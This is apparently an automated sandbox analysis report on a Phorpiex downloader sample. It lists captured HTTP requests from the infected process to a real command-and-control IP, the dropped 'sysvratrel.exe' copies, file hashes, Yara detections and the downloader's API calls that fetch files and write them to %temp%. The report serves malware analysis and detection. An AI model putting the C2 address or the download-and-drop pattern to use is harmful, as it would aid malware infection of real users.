Apr 24, 2024 10:10:17.378948927 CEST	1289	IN	Data Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]!qk%wDv
Apr 24, 2024 10:10:17.378984928 CEST	1289	IN	Data Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29 Data Ascii: ySDY'\|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
Apr 24, 2024 10:10:17.379548073 CEST	1289	IN	Data Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d Data Ascii: zXZrE@97M,RgdnfHX\|dgA}3^0J?+i-${2\|w'yc\|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m\|'D^
Apr 24, 2024 10:10:17.379601002 CEST	1289	IN	Data Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5 Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
Apr 24, 2024 10:10:17.379618883 CEST	1289	IN	Data Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9 Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut\|.G%umnnfE~dT=D-%7}=]V#+W$Bh
Apr 24, 2024 10:10:17.714423895 CEST	1289	IN	Data Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49768	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:19.750055075 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:20.087399960 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:19 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49769	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:22.452941895 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:22.788122892 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:22 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49771	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:25.150958061 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:25.485863924 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:25 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49772	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:27.839699984 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:28.177259922 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:27 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49773	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:30.542294025 CEST	166	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:30.878624916 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	10:06:53
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\957C4XK6Lt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\957C4XK6Lt.exe"
Imagebase:	0x530000
File size:	10'240 bytes
MD5 hash:	F33C75710D0E0463A2528E619C2EE382
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:06:59
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\Temp\135143440.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\135143440.exe
Imagebase:	0x400000
File size:	86'016 bytes
MD5 hash:	36010B83BCCFCD1032971DF9FC5082A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\135143440.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:07:13
Start date:	24/04/2024
Path:	C:\Users\user\sysvratrel.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\sysvratrel.exe"
Imagebase:	0x400000
File size:	86'016 bytes
MD5 hash:	36010B83BCCFCD1032971DF9FC5082A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:07:14
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1682018248.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1682018248.exe
Imagebase:	0x400000
File size:	86'016 bytes
MD5 hash:	CD1D9C0ED8763E6BB3EE7EFB133DC60E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1682018248.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:07:21
Start date:	24/04/2024
Path:	C:\Windows\sysvratrel.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sysvratrel.exe"
Imagebase:	0x400000
File size:	86'016 bytes
MD5 hash:	36010B83BCCFCD1032971DF9FC5082A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
Antivirus matches:	Detection: 65%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:07:30
Start date:	24/04/2024
Path:	C:\Users\user\sysvratrel.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\sysvratrel.exe"
Imagebase:	0x400000
File size:	86'016 bytes
MD5 hash:	36010B83BCCFCD1032971DF9FC5082A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	37.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.6%
Total number of Nodes:	87
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00531080 Relevance: 57.9, APIs: 27, Strings: 6, Instructions: 175
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00531089
srand.MSVCR90 ref: 00531090
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005310B0
rand.MSVCR90 ref: 005310B6
rand.MSVCR90 ref: 005310CA
wsprintfW.USER32 ref: 005310F1
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531107
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00531133
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00531162
InternetReadFile.WININET(00000000,?,00000103,?), ref: 00531195
WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 005311C6
